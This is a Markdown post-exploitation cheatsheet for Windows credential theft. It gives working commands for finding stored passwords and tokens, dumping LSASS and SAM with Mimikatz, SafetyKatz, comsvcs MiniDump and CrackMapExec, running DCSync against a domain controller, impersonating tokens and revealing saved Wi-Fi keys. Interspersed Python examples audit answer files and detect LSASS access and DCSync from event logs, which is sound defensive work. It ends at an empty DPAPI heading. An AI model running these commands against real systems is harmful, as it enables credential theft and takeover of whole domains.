Post-Exploitation.md

File metadata and controls

219 lines (178 loc) · 5.85 KB

# Post-Exploitation

## Find credentials in files

### Look for SAM files

```powershell
Get-ChildItem -Path C:\Windows\Repair\* -Include *.SAM*,*.SYSTEM* -Force -Recurse
Get-ChildItem -Path C:\Windows\System32\config\RegBack\* -Include *.SAM*,*.SYSTEM* -Force -Recurse
Get-ChildItem -Path C:\* -Include *.SAM*,*.SYSTEM* -Force -Recurse
```

### Check the registry for passwords

```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### Find the autologon credentials registry key

```powershell
Get-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" -Name "DefaultPassword"
```

### Look for unattend and sysprep files

```powershell
Get-ChildItem -Path C:\* -Recurse -Include *Unattend.xml*
Get-ChildItem -Path C:\Windows\Panther\* -Recurse -Include *Unattend.xml*
Get-ChildItem -Path C:\Windows\System32\* -Recurse -Include *sysprep.xml*,*sysprep.inf*
Get-ChildItem -Path C:\* -Recurse -Include *Unattend.xml*,*sysprep.xml*,*sysprep.inf*
```
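The defender's counterpart to the search above is to audit the answer files themselves, so that a deployment image can be confirmed clean before it ships. The Python below is an added example, not code from this cheatsheet: it parses an `unattend.xml`/`sysprep.xml` (the `urn:schemas-microsoft-com:unattend` namespace is the real one) and reports every credential element that still carries a value, noting whether it is plain text or the Base64 form. The sample XML, the account names and the `scan_directories` helper are constructed for the example.

```python
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# Namespace used by Windows answer files (unattend.xml / sysprep.xml).
NS = {"u": "urn:schemas-microsoft-com:unattend"}

# Answer-file elements that carry a credential.
CRED_TAGS = {"Password", "AdministratorPassword", "DomainPassword"}

# Constructed sample answer file (not taken from any real deployment): an
# AutoLogon password left in the Base64 form and a local account password
# left in plain text; the AdministratorPassword element is empty.
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>U3VwZXJTZWNyZXQxUGFzc3dvcmQ=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value></Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>Winter2024!</Value>
              <PlainText>true</PlainText>
            </Password>
            <Name>deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def _local(tag):
    """Strip the namespace prefix ElementTree puts on every tag."""
    return tag.rsplit("}", 1)[-1]


def find_credentials(xml_text):
    """Return one finding per credential element whose <Value> is not empty."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for el in root.iter():
        if _local(el.tag) not in CRED_TAGS:
            continue
        value = el.find("u:Value", NS)
        if value is None or not (value.text or "").strip():
            continue  # empty <Value/>: nothing was left behind
        plain = el.find("u:PlainText", NS)
        is_plain = plain is not None and (plain.text or "").strip().lower() == "true"
        # Readable location such as settings[oobeSystem]/component/AutoLogon/Password
        parts, node = [], el
        while node is not None and node is not root:
            name = _local(node.tag)
            if name == "settings":
                name += "[%s]" % node.get("pass")
            parts.append(name)
            node = parents.get(node)
        # The account name sits beside the credential (AutoLogon/Username, LocalAccount/Name).
        account = None
        parent = parents.get(el)
        if parent is not None:
            for tag in ("u:Username", "u:Name"):
                hit = parent.find(tag, NS)
                if hit is not None and hit.text:
                    account = hit.text.strip()
                    break
        findings.append({"path": "/".join(reversed(parts)), "account": account, "plaintext": is_plain})
    return findings


def scan_directories(dirs):
    """Audit every answer file under the given directories; returns {file: findings}."""
    report = {}
    for base in dirs:
        for pattern in ("*nattend.xml", "*ysprep.xml"):
            for path in Path(base).rglob(pattern):
                try:
                    report[str(path)] = find_credentials(path.read_text(encoding="utf-8-sig"))
                except (OSError, ET.ParseError) as exc:
                    report[str(path)] = [{"error": str(exc)}]
    return report


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for file, found in scan_directories(sys.argv[1:]).items():
            print(file, found)
    else:
        for finding in find_credentials(SAMPLE_UNATTEND):
            print(finding)
```

Run it with the directories from the commands above (`C:\Windows\Panther`, `C:\Windows\System32\Sysprep`) as arguments; a clean image produces an empty finding list for every file. The Base64 form is flagged as well as plain text because it is an encoding, not encryption, so either one is a credential to remove.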

### Get the PowerShell history path and read the history

```powershell
(Get-PSReadlineOption).HistorySavePath
cat <path>
```

### Look for PowerShell history files

```powershell
Get-ChildItem -Path C:\Users\* -Force -Include *ConsoleHost_history* -Recurse -ErrorAction SilentlyContinue
```

### Look for hardcoded passwords in scripts

```powershell
Get-ChildItem -Path C:\* -Recurse -Include *.xml,*.ps1,*.bat,*.txt | Select-String "password" | Export-Csv C:\Scripts\Report.csv -NoTypeInformation
Get-ChildItem -Path C:\* -Recurse -Include *.xml,*.ps1,*.bat,*.txt | Select-String "creds" | Export-Csv C:\Scripts\Report.csv -NoTypeInformation
```

### Check for Azure tokens

```powershell
Get-ChildItem -Path "C:\Users\*" -Recurse -Include *accessTokens.json*,*TokenCache.dat*,*AzureRmContext.json*
```

### Dump the password vault

```powershell
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword(); $_ }
```

## Dumping LSASS

### CrackMapExec

```
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy
```

### DumpCreds

```powershell
Invoke-Mimikatz -DumpCreds
```

Dump credentials on a local machine using Mimikatz:

```powershell
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
```

Using SafetyKatz (minidump of LSASS and PELoader to run Mimikatz):

```
SafetyKatz.exe "sekurlsa::ekeys"
```

Dump credentials using SharpKatz (C# port of some Mimikatz functionality):

```
SharpKatz.exe --Command ekeys
```

Dump credentials using Dumpert (direct system calls and API unhooking):

```
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
```

Using pypykatz (Mimikatz functionality in Python):

```
pypykatz.exe live lsa
```

### Use Task Manager

- Find the lsass process in the Details tab
- Right click and select "Create dump file"

### Manually

```
Get-Process lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS PROCESS ID> C:\Users\lsass.dmp full
mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
```
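Every technique in this section ends the same way from the defender's side: a process opens a handle to `lsass.exe` with memory-read access, which Sysmon records as Event ID 10 (ProcessAccess) together with the granted access mask and the caller's stack. The Python below is an added detection example, not part of this cheatsheet. It flags any non-allowlisted image that obtains `PROCESS_VM_READ` on LSASS, and adds the two classic qualifiers: `dbghelp.dll`/`dbgcore.dll` in the call trace (the home of `MiniDumpWriteDump`, which the comsvcs, Task Manager and SafetyKatz routes all use) and `UNKNOWN` frames (code running from unbacked memory). The flattened `Key=Value;...` record layout, the sample events and the allowlist are constructed assumptions; a real deployment reads the XML from the Sysmon event channel.

```python
# Access right any memory dump needs (value from winnt.h).
PROCESS_VM_READ = 0x0010

# DLLs that host MiniDumpWriteDump; seeing them in the call trace of an
# lsass handle open is the classic minidump signature.
MINIDUMP_DLLS = ("dbghelp.dll", "dbgcore.dll")

# Assumed allowlist of images that legitimately open lsass with read access.
# A path alone can be mimicked, so a production rule pairs it with signer/hash checks.
BENIGN_SOURCE_IMAGES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\lsm.exe",
}
BENIGN_SOURCE_PREFIXES = (r"c:\programdata\microsoft\windows defender",)

# Constructed Sysmon Event ID 10 records, flattened to Key=Value;Key=Value (one per line).
SAMPLE_SYSMON_EVENTS = r"""
EventID=10;SourceImage=C:\Windows\System32\svchost.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1000;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\KERNELBASE.dll+2e7a6
EventID=10;SourceImage=C:\Windows\System32\rundll32.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1FFFFF;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\KERNELBASE.dll+2e7a6|C:\Windows\System32\dbgcore.dll+1a5b0|C:\Windows\System32\comsvcs.dll+e8c1
EventID=10;SourceImage=C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0.0-0\MsMpEng.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1410;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\KERNELBASE.dll+2e7a6
EventID=10;SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1010;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\KERNELBASE.dll+2e7a6|UNKNOWN(000001F2A3B40000)
EventID=10;SourceImage=C:\Windows\System32\Taskmgr.exe;TargetImage=C:\Windows\System32\lsass.exe;GrantedAccess=0x1FFFFF;CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\KERNELBASE.dll+2e7a6|C:\Windows\System32\dbghelp.dll+3f2a1
"""


def parse_event(line):
    """Parse one flattened record into a dict (constructed layout, see above)."""
    return dict(part.split("=", 1) for part in line.split(";") if "=" in part)


def is_benign_source(image):
    """True when the source image is on the (assumed) allowlist."""
    image = image.lower()
    return image in BENIGN_SOURCE_IMAGES or image.startswith(BENIGN_SOURCE_PREFIXES)


def classify_lsass_access(ev):
    """Return an alert dict for a suspicious lsass handle open, else None."""
    if ev.get("EventID") != "10":
        return None
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    source = ev.get("SourceImage", "")
    access = int(ev.get("GrantedAccess", "0x0"), 16)
    calltrace = ev.get("CallTrace", "").lower()
    if not access & PROCESS_VM_READ:
        return None  # no memory read right: cannot dump anything
    if is_benign_source(source):
        return None
    reasons = ["PROCESS_VM_READ on lsass from non-allowlisted image"]
    if any(dll in calltrace for dll in MINIDUMP_DLLS):
        reasons.append("minidump API in call stack")
    if "unknown" in calltrace:
        reasons.append("unbacked memory in call stack")
    return {"source": source, "access": hex(access), "reasons": reasons}


def detect(lines):
    """Run the rule over an iterable of flattened records; returns the alerts."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        alert = classify_lsass_access(parse_event(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_SYSMON_EVENTS.strip().splitlines()):
        print(alert)
```

The access-mask check is deliberately loose (`0x1010`, `0x1410` and `0x1FFFFF` all satisfy it) because tooling varies the mask it requests; the allowlist, not the mask, does the noise reduction. Hosts where Credential Guard or RunAsPPL is enabled still log these handle opens, which makes the rule a useful cross-check that the protection is actually in force.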

## Dumping SAM

### CrackMapExec

```
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --sam
```

### Mimikatz dump SAM

```powershell
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'
```

### Manually

```
reg save HKLM\SAM SamBkup.hiv
reg save HKLM\System SystemBkup.hiv

mimikatz.exe
mimikatz # lsadump::sam SamBkup.hiv SystemBkup.hiv
```

## Mimikatz

### Mimikatz dump credentials on the local machine

```powershell
Invoke-Mimikatz -DumpCreds
```

### Mimikatz dump credentials on multiple remote machines

```powershell
Invoke-Mimikatz -DumpCreds -ComputerName @("<COMPUTERNAME 1>","<COMPUTERNAME 2>")
```

### Mimikatz dump certs

```powershell
Invoke-Mimikatz -DumpCerts
```

### Mimikatz dump vault

```powershell
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "vault::cred /patch" "vault::list"'
```

### Mimikatz dump everything to find privs

```powershell
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "kerberos::list /export" "vault::cred /patch" "vault::list" "lsadump::sam" "lsadump::secrets" "lsadump::cache"'
```

## DCSync

- Extract creds from the DC without code execution on it, using DA privileges.

### Mimikatz DCSync attack, specific user

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<USER> /domain:<DOMAIN>"'
```

### Mimikatz DCSync attack, everything

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /all"'
```

### SafetyKatz

```
SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\<USER>" "exit"
```
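DCSync leaves no trace on the endpoint because it is just a replication request, so it has to be caught on the domain controller: with directory-service access auditing on, the request is logged as Event 4662 on the domain object with the control access rights `DS-Replication-Get-Changes` (`1131f6aa-...`) and `DS-Replication-Get-Changes-All` (`1131f6ad-...`), which are the real schema `rightsGuid` values. The Python below is an added example, not part of this cheatsheet: it parses 4662 records in the standard Windows event XML and raises a finding whenever a subject that is neither a DC computer account nor a sanctioned replication service asks for those rights. The event template, the account names and the allowlist are constructed.

```python
import xml.etree.ElementTree as ET

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Control access rights a replication request uses (AD schema rightsGuid values).
GET_CHANGES = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
GET_CHANGES_ALL = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
GET_CHANGES_FILTERED = "{89e95b76-444d-4c62-991a-0facbeda640c}"
REPLICATION_RIGHTS = {
    GET_CHANGES: "DS-Replication-Get-Changes",
    GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
    GET_CHANGES_FILTERED: "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed allowlist: DC computer accounts plus an Azure AD Connect sync account.
SANCTIONED_REPLICATORS = {"DC01$", "DC02$", "MSOL_0123456789ab"}

# Template for a constructed 4662 record; %%7688 is the "Control Access" resolver string.
_EVENT_TEMPLATE = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4662</EventID>
  <Computer>DC01.corp.example</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">__SUBJECT__</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="ObjectType">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
    <Data Name="AccessMask">0x100</Data>
    <Data Name="Properties">%%7688
__PROPS__</Data>
  </EventData>
</Event>"""


def sample_4662(subject, rights):
    """Build a constructed 4662 record for the given subject and right GUIDs."""
    props = "\n".join("\t" + guid for guid in rights)
    return _EVENT_TEMPLATE.replace("__SUBJECT__", subject).replace("__PROPS__", props)


SAMPLE_EVENTS = [
    sample_4662("DC02$", [GET_CHANGES, GET_CHANGES_ALL]),    # normal DC-to-DC replication
    sample_4662("jsmith", [GET_CHANGES, GET_CHANGES_ALL]),   # user account pulling every secret
    sample_4662("svc-backup", [GET_CHANGES]),                # partial: Get-Changes only
]


def parse_event(xml_text):
    """Flatten a Windows event XML record into {event_id, <EventData names>...}."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", default="0", namespaces=EVT_NS))
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVT_NS)}
    return {"event_id": event_id, **data}


def classify_replication(ev):
    """Return a finding for a replication request from a non-sanctioned subject, else None."""
    if ev.get("event_id") != 4662:
        return None
    props = ev.get("Properties", "").lower()
    rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
    if not rights:
        return None  # some other object access, not replication
    subject = ev.get("SubjectUserName", "")
    if subject.upper() in {a.upper() for a in SANCTIONED_REPLICATORS}:
        return None
    # Get-Changes-All is what returns password hashes; without it the pull is partial.
    severity = "high" if GET_CHANGES_ALL in props else "medium"
    return {"subject": subject, "domain": ev.get("SubjectDomainName", ""),
            "rights": rights, "severity": severity}


def detect(events_xml):
    """Run the rule over an iterable of event XML strings; returns the findings."""
    return [f for f in (classify_replication(parse_event(x)) for x in events_xml) if f]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The allowlist is keyed on the subject name only for brevity; in production key it on SID and on the source DC, and review it whenever a sync account is added, since an attacker who is granted the two replication rights on the domain object (the actual precondition, which DA membership happens to satisfy) will appear in exactly this event.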

## Token manipulation

### List all tokens on the machine

```powershell
Invoke-TokenManipulation -ShowAll
```

### List all unique, usable tokens on the machine

```powershell
Invoke-TokenManipulation -Enumerate
```

### Start a new process with the token of a specific user

```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"
```

### Start a new process with the token of another process

```powershell
Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 500
```

## Get the Wi-Fi password

### Get saved Wi-Fi networks

```
netsh wlan show profiles
```

### Get the key of a saved Wi-Fi network

```
netsh wlan show profiles name=<NAME> key=clear
```

## DPAPI